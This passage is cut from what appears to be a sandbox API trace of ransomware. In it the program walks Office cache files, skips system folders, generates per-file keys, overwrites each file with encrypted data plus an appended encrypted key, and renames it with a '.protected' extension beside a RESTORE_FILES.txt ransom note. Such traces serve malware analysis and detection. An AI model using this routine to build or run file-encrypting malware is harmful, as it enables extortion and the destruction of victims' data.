dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.174] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\.." 
(normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0062.174] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.174] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0062.174] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Program Files") returned -1 [0062.174] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Program Files (x86)") returned -1 [0062.174] lstrcmpiW (lpString1="Office32WW.msi", lpString2="$Recycle.bin") returned 1 [0062.174] lstrcmpiW (lpString1="Office32WW.msi", lpString2="System Volume Information") returned -1 [0062.174] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0062.174] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".protected") returned 0x0 [0062.174] lstrcmpW (lpString1="Office32WW.msi", lpString2="RESTORE_FILES.txt") returned -1 [0062.174] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.175] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.175] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.176] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0062.176] StrStrW 
(lpFirst="Office32WW.msi", lpSrch=".txt") returned 0x0 [0062.176] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0062.176] StrStrW (lpFirst="Office32WW.msi", lpSrch=".rar") returned 0x0 [0062.176] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0062.176] StrStrW (lpFirst="Office32WW.msi", lpSrch=".zip") returned 0x0 [0062.176] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.182] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.182] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.182] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.182] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.205] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.205] CloseHandle (hObject=0xb4) returned 1 [0062.205] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.protected") returned 91 [0062.205] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.protected")) returned 1 [0062.205] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.205] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0062.205] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Program Files") returned -1 [0062.205] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Program Files (x86)") returned -1 [0062.206] lstrcmpiW (lpString1="Office32WW.xml", lpString2="$Recycle.bin") returned 1 [0062.206] lstrcmpiW (lpString1="Office32WW.xml", lpString2="System Volume Information") returned -1 [0062.206] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0062.206] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".protected") returned 0x0 [0062.206] lstrcmpW (lpString1="Office32WW.xml", lpString2="RESTORE_FILES.txt") returned -1 [0062.206] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.206] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.206] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.206] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0062.206] StrStrW (lpFirst="Office32WW.xml", lpSrch=".txt") returned 0x0 [0062.206] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0062.206] StrStrW (lpFirst="Office32WW.xml", lpSrch=".rar") returned 0x0 [0062.206] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0062.206] StrStrW (lpFirst="Office32WW.xml", lpSrch=".zip") returned 0x0 [0062.206] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x10b2, lpOverlapped=0x0) returned 1 [0062.233] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.233] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x10b2, lpOverlapped=0x0) returned 1 [0062.234] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.234] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.234] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.234] CloseHandle (hObject=0xb4) 
returned 1 [0062.235] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.protected") returned 91 [0062.235] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.protected")) returned 1 [0062.235] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.235] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0062.235] lstrcmpiW (lpString1="ose.exe", lpString2="Program Files") returned -1 [0062.235] lstrcmpiW (lpString1="ose.exe", lpString2="Program Files (x86)") returned -1 [0062.236] lstrcmpiW (lpString1="ose.exe", lpString2="$Recycle.bin") returned 1 [0062.236] lstrcmpiW (lpString1="ose.exe", lpString2="System Volume Information") returned -1 [0062.236] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0062.236] StrStrIW (lpFirst="ose.exe", lpSrch=".protected") returned 0x0 [0062.236] lstrcmpW (lpString1="ose.exe", lpString2="RESTORE_FILES.txt") returned -1 [0062.236] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.236] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.236] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.236] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0062.236] StrStrW (lpFirst="ose.exe", lpSrch=".txt") returned 0x0 [0062.236] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0062.236] StrStrW (lpFirst="ose.exe", lpSrch=".rar") returned 0x0 [0062.236] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0062.236] StrStrW (lpFirst="ose.exe", lpSrch=".zip") returned 0x0 [0062.236] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.448] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.448] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.449] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.449] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.502] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.537] CloseHandle (hObject=0xb4) returned 1 [0062.538] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.protected") returned 84 [0062.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.protected")) returned 1 [0062.542] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.542] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0062.542] lstrcmpiW (lpString1="osetup.dll", lpString2="Program Files") returned -1 [0062.542] lstrcmpiW (lpString1="osetup.dll", lpString2="Program Files (x86)") returned -1 [0062.542] lstrcmpiW (lpString1="osetup.dll", lpString2="$Recycle.bin") returned 1 [0062.542] lstrcmpiW (lpString1="osetup.dll", lpString2="System Volume Information") returned -1 [0062.542] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0062.542] StrStrIW (lpFirst="osetup.dll", lpSrch=".protected") returned 0x0 [0062.542] lstrcmpW (lpString1="osetup.dll", lpString2="RESTORE_FILES.txt") returned -1 [0062.542] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.542] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: 
pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.543] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.543] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0062.543] StrStrW (lpFirst="osetup.dll", lpSrch=".txt") returned 0x0 [0062.543] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0062.543] StrStrW (lpFirst="osetup.dll", lpSrch=".rar") returned 0x0 [0062.543] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0062.543] StrStrW (lpFirst="osetup.dll", lpSrch=".zip") returned 0x0 [0062.543] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.566] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.566] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.567] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.567] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, 
lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.688] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.688] CloseHandle (hObject=0xb4) returned 1 [0062.689] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.protected") returned 87 [0062.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.protected")) returned 1 [0062.690] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.690] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0062.690] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Program Files") returned -1 [0062.690] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Program Files (x86)") returned -1 [0062.690] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="$Recycle.bin") returned 1 [0062.690] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="System Volume Information") returned -1 [0062.690] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0062.690] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".protected") returned 0x0 [0062.690] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="RESTORE_FILES.txt") returned -1 [0062.690] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.690] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.690] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.691] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0062.691] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".txt") returned 0x0 [0062.691] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0062.691] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".rar") returned 0x0 [0062.691] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0062.691] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".zip") returned 0x0 [0062.691] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.718] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.718] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.719] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0062.719] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.755] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.755] CloseHandle (hObject=0xb4) returned 1 [0062.756] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.protected") returned 89 [0062.756] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.protected")) returned 1 [0062.756] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.756] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0062.756] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Program Files") returned -1 [0062.757] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Program Files (x86)") returned -1 [0062.757] lstrcmpiW (lpString1="PidGenX.dll", lpString2="$Recycle.bin") returned 1 [0062.757] lstrcmpiW (lpString1="PidGenX.dll", lpString2="System Volume Information") returned -1 [0062.757] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0062.757] StrStrIW 
(lpFirst="PidGenX.dll", lpSrch=".protected") returned 0x0 [0062.757] lstrcmpW (lpString1="PidGenX.dll", lpString2="RESTORE_FILES.txt") returned -1 [0062.757] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.757] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.757] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.757] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0062.757] StrStrW (lpFirst="PidGenX.dll", lpSrch=".txt") returned 0x0 [0062.757] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0062.757] StrStrW (lpFirst="PidGenX.dll", lpSrch=".rar") returned 0x0 [0062.757] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0062.757] StrStrW (lpFirst="PidGenX.dll", lpSrch=".zip") returned 0x0 [0062.757] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.777] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.777] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.777] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.777] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.812] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.812] CloseHandle (hObject=0xb4) returned 1 [0062.812] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 